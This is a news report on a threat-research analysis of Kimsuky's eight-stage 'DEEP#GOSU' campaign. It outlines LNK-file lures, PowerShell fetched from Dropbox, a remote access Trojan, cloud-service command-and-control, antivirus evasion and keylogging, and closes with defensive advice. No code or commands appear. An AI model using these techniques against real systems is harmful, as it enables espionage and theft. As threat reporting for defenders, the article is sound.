North Korea-linked threat group Kimsuky has adopted a longer, eight-step attack chain that abuses legitimate cloud services and employs evasive malware to conduct cyber espionage and financial crimes against South Korean entities.
In a campaign called “DEEP#GOSU,” attributed to the group, cyber espionage operators were very focused on a “living off the land” strategy, using commands to install a variety of .NET assemblies: legitimate code components for applications .NET – to create the basis of the attacker’s toolkit, Securonix researchers wrote in a threat analysis today.
Kimsuky also used LNK files attached to emails, command scripts downloaded from Dropbox, and code written in PowerShell and VBScript to conduct offensive operations.
While typical cyberattacks use five or fewer stages, the DEEP#GOSU campaign used eight. And while some tools could be detected by virus scanners and other defensive technologies, attackers actively aimed to foil detection, says Oleg Kolesnikov, vice president of threat research at Securonix.
“There were many different components and payloads, and different payload components had different scanner detection rates,” he says. “Because the attackers actively used security tool evasion and disruption techniques, including closing security tools and adding payloads to exclusions, among other things, the number of scanners that detected this was likely fewer relevant in this case.”
The group Kimsuky, also known as APT43, Emerald Sleet and Velvet Chollima, has grown its activity in 2023, shifting to a greater focus on cryptocurrency beyond the traditional focus on cyber espionage. Kimsuky is well known for his skilled spear-phishing and not necessarily for its technical sophisticationbut the latest attack showed that the group has evolved somewhat, according to the analysis written by three Securonix researchers.
“The malware payloads… represent a sophisticated, multi-stage threat, designed to operate covertly on Windows systems, especially from a network monitoring perspective,” the three researchers said in their analysis. “Each step was encrypted using AES and a common password and IV [initialization vector] which should minimize network scan or flat file detections.”
Using Dropbox and Google to bypass security checks
The first phase of the attack is executed when the user opens an LNK file attached to an email, which downloads the PowerShell code from Dropbox. The code executed during the second phase downloads additional scripts from Dropbox and instructs the compromised system to install a remote access Trojan, TutClient, in phase 3.
Heavy use of Dropbox, and Google in later stages, helps avoid detection, threat researchers at Securonix said in the analysis.
“All C2 communication is handled through legitimate services like Dropbox or Google Docs that allow the malware to integrate undetected into normal network traffic,” they wrote. “Because these payloads came from remote sources like Dropbox, they allowed the malware’s maintainers to dynamically update its functionality or implement additional modules without direct interaction with the system.”
Later stages of the attack install a script that runs randomly over a matter of hours to help monitor and control systems and provide persistence. The final stage monitors user activity by logging keystrokes on the compromised system.
Multi-phase attacks highlight defense in depth
While detection rates for the initial stages of the attack ranged from 5% to 45% for host-based security, network security platforms may struggle to detect later stages of attacks because threat actors Kimsuky they use encrypted traffic, legitimate cloud file-transfer services, and downloaded .NET components.
The multi-pronged attack highlights the benefits of having multiple layers of defense, Kolesnikov says.
“In our experience, in cases like this, an up-to-date antivirus may not be sufficient because the behaviors exhibited include disruption and circumvention of security tools,” says Kolesnikov. “Our recommendation is that organizations leverage defense in depth so they don’t rely on just one specific security tool.”
Email security gateways, for example, would likely block the LNK file due to its enormous size of 2.2 MB, compared to the typical size measured in kilobytes, he says.